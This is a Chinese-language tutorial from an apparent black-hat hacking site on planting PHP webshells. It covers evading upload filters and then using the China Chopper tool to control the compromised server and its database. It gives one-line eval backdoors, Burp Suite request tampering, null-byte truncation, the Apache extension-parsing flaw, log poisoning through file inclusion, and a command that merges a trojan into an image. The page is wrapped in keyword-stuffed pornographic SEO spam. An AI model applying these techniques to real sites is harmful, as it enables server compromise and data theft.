久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當(dāng)前位置:首頁 >> 黑帽軟件 >> WebShell >> 菜刀繞過文件上傳

菜刀繞過文件上傳

yupang WebShell 2601

webshell是web入侵的腳本攻擊工具。簡單說,webshell就是一個(gè)asp或php木馬后門,黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。然后黑客就可以用web的方式,通過asp或php木馬后門控制網(wǎng)站服務(wù)器,包括上傳下載文件、查看數(shù)據(jù)庫、執(zhí)行任意程序命令等。一句話木馬也稱為小馬<?php @eva($_REQUEST['cmd']);?>

webshell 最大的優(yōu)點(diǎn)就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過80端口傳遞的,因此不會(huì)被防火墻攔截。并且使用webshell一般不會(huì)在系統(tǒng)日志中留下記錄,只會(huì)在網(wǎng)站的web日志中留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。

1.繞過前臺(tái)過濾

  • a.繞過前臺(tái)腳本檢測擴(kuò)展名上傳webshell

  • b.繞過Content-Type檢測文件類型上傳webshell

  • c.利用00截?cái)嗌蟼鱳ebshell

2.繞過服務(wù)器端擴(kuò)展名檢測上傳

3. 構(gòu)造圖片web木馬


4|0 實(shí)戰(zhàn)


 1. 前臺(tái)過濾

a.繞過前臺(tái)腳本檢測

1) 編寫php的一句話木馬,內(nèi)容為<?php @eval($_POST[pass]); ?>,文件文pass.php

直接上傳pass.php文件發(fā)現(xiàn)無法上傳,已經(jīng)被限制文件格式

>>上傳pass.php

 

>>web網(wǎng)站做了上傳文件限制,不可以直接上傳后綴為.php的文件

2)將文件修改文pass.php.jpg圖片格式,上傳成功,證明可以通過圖片格式進(jìn)行繞過

>>上傳pass.php.jpg的圖片文件

 >>訪問該文件顯示成功

 

3)瀏覽器使用本地代理,再次上傳,利用burnsuite工具將包劫持,將filenname修改為.php格式,再將包發(fā)出去。這時(shí)候就顯上傳pass.php文件成功,利用中國菜刀查看文件路徑就可以查看數(shù)據(jù)庫

>>截取pass.php.jpg文件上傳的包

 

>>Content Type不變,修改后綴為pass.php

>>將修改后的包Foward發(fā)送出去,訪問上傳目錄下pass.php文件是否存在

 

>>可以直接用菜刀工具連接該木馬,可以對(duì)數(shù)據(jù)庫進(jìn)行控制了

 

b.繞過Content-Type檢測文件類型上傳webshell

  text/html的意思是將文件的content-type設(shè)置為text/html的形式,瀏覽器在獲取到這種文件時(shí)會(huì)自動(dòng)調(diào)用html的解析器對(duì)文件進(jìn)行相應(yīng)的處理。  

text/plain的意思是將文件設(shè)置為純文本的形式,瀏覽器在獲取到這種文件時(shí)并不會(huì)對(duì)其進(jìn)行處理。(image/jpeg為圖片格式)

1)直接上傳pass.php文件,但是無法查看相應(yīng)數(shù)據(jù)庫,應(yīng)該是再conten type識(shí)別了

2)使用burn suite劫持?jǐn)?shù)據(jù)包,將image/jpeg修改為text/plai,再進(jìn)行上傳,看到上傳成功

3)使用中國菜刀可以查看相應(yīng)的數(shù)據(jù)庫

 

c. 利用00截?cái)嗌蟼鱳ebshell

1)上傳pass.php.jpg文件,顯示上傳成功

2)使用burn suite劫持,然后對(duì)hex進(jìn)行修改,查看ASCLL表,將對(duì)應(yīng)的jpg格式修改成為php格式。我發(fā)現(xiàn)了一個(gè)在線編碼解碼的可以更快對(duì)相應(yīng)進(jìn)行修改,網(wǎng)址https://www.107000.com/T-Hex/

3)修改之后就使用中國菜刀進(jìn)行解析,查看相應(yīng)的數(shù)據(jù)庫

 

4|22.繞過服務(wù)器端擴(kuò)展名檢測上傳

a.利用apache解析漏洞上傳webshell

1) 將上傳的木馬文件后綴名.php改為.php.abc

2) 利用apache的解析漏洞用菜刀連接擴(kuò)展名為.abc的文件填寫木馬密碼和選擇腳本類型,獲得網(wǎng)站的一個(gè)webshell。

3)通過apache日志獲得webshell測試文件包含,在URL中提交GET參數(shù)【?ajest=test.php】向目標(biāo)站點(diǎn)提交錯(cuò)誤信息,Apache會(huì)將錯(cuò)誤信息寫入日志。通過本地文件包含漏洞,包含apache日志,即可獲得一句話webshell

 

4|33. 構(gòu)造PHP圖片木馬

一般情況下,網(wǎng)頁會(huì)檢測文件內(nèi)容是不是真的有效圖片,如果不是就不會(huì)允許上傳

1)上傳一個(gè)pass.phpjpg文件,顯示不允許上傳

2)制作一個(gè)木馬圖片:將一張正常圖片666.jpg和木馬文件pass.php放在同一個(gè)目錄下,使用cmd到這個(gè)文件夾,將兩個(gè)文件合成.jpg文件 copy 666.jpg+pass.php hack.jpg

3)上傳hack.jpg文件改為hack.jpg.php,訪問這個(gè)文件路徑成功

4)用中國菜刀打開就ok了,可以看到數(shù)據(jù)庫信息





協(xié)助本站SEO優(yōu)化一下,謝謝!
關(guān)鍵詞不能為空

免責(zé)聲明

資料匯總于網(wǎng)絡(luò),如有侵權(quán) 聯(lián)系站長刪除 http://www.790079.com

同類推薦

發(fā)表評(píng)論

訪客

◎歡迎參與討論,請(qǐng)?jiān)谶@里發(fā)表您的看法和觀點(diǎn)。
站點(diǎn)信息
標(biāo)簽列表
網(wǎng)站分類
友情鏈接
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
亚洲综合精品伊人久久| 国产精品国产福利国产秒拍| 97欧洲一区二区精品免费| 久久精品日产第一区二区三区精品版 | 午夜精品亚洲一区二区三区嫩草| 精品欧美一区二区在线观看视频| 久久综合毛片| 亚洲一区在线直播| 蜜桃传媒视频第一区入口在线看 | 久久躁日日躁aaaaxxxx| 青青青国产在线视频| 国产精品96久久久久久 | 欧美亚洲国产成人精品| 久久久噜噜噜久久| 日本人成精品视频在线| 131美女爱做视频| 亚洲国产精品女人| 99亚洲精品视频| 在线精品日韩| 成人免费91在线看| 精品久久久久久乱码天堂| 欧美婷婷久久| 日韩亚洲国产中文字幕| 日韩欧美视频网站| 色噜噜国产精品视频一区二区 | 日本香蕉视频在线观看| 131美女爱做视频| 亚洲乱码一区二区三区三上悠亚 | 国产人妻人伦精品| 久久电影一区二区| 国产淫片免费看| 欧美巨大黑人极品精男| 国产一区二区在线观看免费播放| 久久亚洲精品国产亚洲老地址| 国内精品久久久久| 九九热精品视频在线播放| 国产欧美在线一区二区| 一区二区三视频| 8090成年在线看片午夜| 日产精品高清视频免费| 久久久久久久久久久av| 欧美日韩亚洲一区二区三区四区| 久久99九九| 欧美精品一区在线发布| 国产精品国产三级国产专区53| 国产人妻互换一区二区| 一本久久a久久精品vr综合| 91精品国产综合久久香蕉的用户体验 | 国产日韩欧美日韩| 久久久久久国产精品久久| 99热亚洲精品| 亚洲欧洲免费无码| 久久av二区| 国产一区在线观| 亚洲欧美日韩精品久久久| 国产freexxxx性播放麻豆| 欧美成ee人免费视频| 欧美成人在线影院| 91免费欧美精品| 日本a在线免费观看| 久久手机免费视频| 国产精品揄拍500视频| 性色av一区二区咪爱| 国产成人精品一区| 国产精品一区久久| 日本中文字幕亚洲| 久青草国产97香蕉在线视频| 国产中文字幕视频在线观看| 亚洲欧美日韩综合一区| 久久精品电影一区二区| 国产伦精品一区二区三区四区免费| 午夜精品久久久久久久99热浪潮 | 日韩在线观看成人| 国产精品一 二 三| 日韩美女免费观看| 欧美激情视频网站| 久久riav| 国语精品免费视频| 亚洲国产一区二区在线| 久久手机精品视频| 91高清免费视频| 黄网站色视频免费观看| 亚洲精品免费在线视频| 国产精品嫩草视频| 久久人人爽人人爽人人片av高清 | 7777精品视频| 国产情人节一区| 日韩欧美视频网站| 一本久道中文无码字幕av| 国产精品免费视频一区二区| 97久久精品在线| 黑人中文字幕一区二区三区| 少妇人妻互换不带套| 国产aⅴ夜夜欢一区二区三区| 精品国内亚洲在观看18黄| 91免费人成网站在线观看18| 国产一区亚洲二区三区| 热99久久精品| 熟妇人妻va精品中文字幕| 欧美激情极品视频| 国产精品裸体一区二区三区| 久久99久久久久久| 91高清视频免费| julia一区二区中文久久94| 国产又粗又爽又黄的视频| 日本成人黄色| 亚洲一区二区三区加勒比| 国产精品久久中文| 日韩一区二区精品视频| 成人精品久久一区二区三区| 精品无人区一区二区三区竹菊| 日韩aⅴ视频一区二区三区| 欧美精品生活片| 色狠狠久久aa北条麻妃| 国产精品一 二 三| 国内精品久久久久久久久| 日本精品视频网站| 亚洲熟妇av日韩熟妇在线| 欧美精品一区在线播放| 久久久91精品国产一区不卡| 久久久天堂国产精品| 国产区二精品视| 狠狠综合久久av| 青青在线视频免费观看| 日本在线视频www| 精品免费日产一区一区三区免费 | 免费毛片网站在线观看| 精品嫩模一区二区三区| 日本高清久久一区二区三区| 中文字幕久久一区| 国产精品美女www| 久久精品99久久香蕉国产色戒| 68精品国产免费久久久久久婷婷| 国内精品视频在线| 日韩精品无码一区二区三区| 欧美一区1区三区3区公司| 亚洲精品一区二区三区樱花| 久久国产视频网站| 国产精品黄视频| 色婷婷av一区二区三区在线观看| xxav国产精品美女主播| 91成人免费视频| 99精品在线直播| 高清视频在线观看一区| 国产欧美日韩91| 国产一区免费在线| 国产日产欧美a一级在线| 精品少妇人欧美激情在线观看 | 国产特级黄色大片| 蜜桃传媒视频麻豆第一区免费观看 | 国精产品一区一区三区有限在线| 日韩精品久久久免费观看| 日本一区二区免费高清视频| 亚洲综合最新在线| 欧美激情xxxxx| 欧美激情极品视频| 伊人久久在线观看| 一级黄色免费在线观看| 亚洲自拍中文字幕| 国产精品色视频| 久久91精品国产| 最新av在线免费观看| 伊人久久大香线蕉综合75| 一区二区精品在线观看| 亚洲欧美日韩精品在线| 午夜久久资源| 青青青青草视频| 欧美精品一区二区视频| 欧美在线视频免费| 狠狠噜天天噜日日噜| 国产一区二区片| 成人av蜜桃| 99免费在线观看视频| 久久久久久久久久久人体| 国产精品麻豆va在线播放| 九九精品在线播放| 亚洲熟妇无码另类久久久| 欧美一级片在线播放| 欧美日韩国产精品一区二区| 成人久久18免费网站漫画| 久久久免费观看| www.欧美精品一二三区| 久久中文字幕在线视频| 欧美日本在线视频中文字字幕| 亚洲v日韩v综合v精品v| 欧洲日本亚洲国产区| 狠狠色综合网站久久久久久久| 国产日韩一区在线| 91精品国产乱码久久久久久久久 | 欧美国产视频一区| 国产日韩一区二区三区| 国产伦精品一区二区三区四区视频 | 亚洲中文字幕无码中文字| 青青草原一区二区| 国产视频99| 91精品视频大全| 久久人人爽人人爽爽久久| 欧美片一区二区三区| 色欲av无码一区二区人妻| 青青草视频在线视频|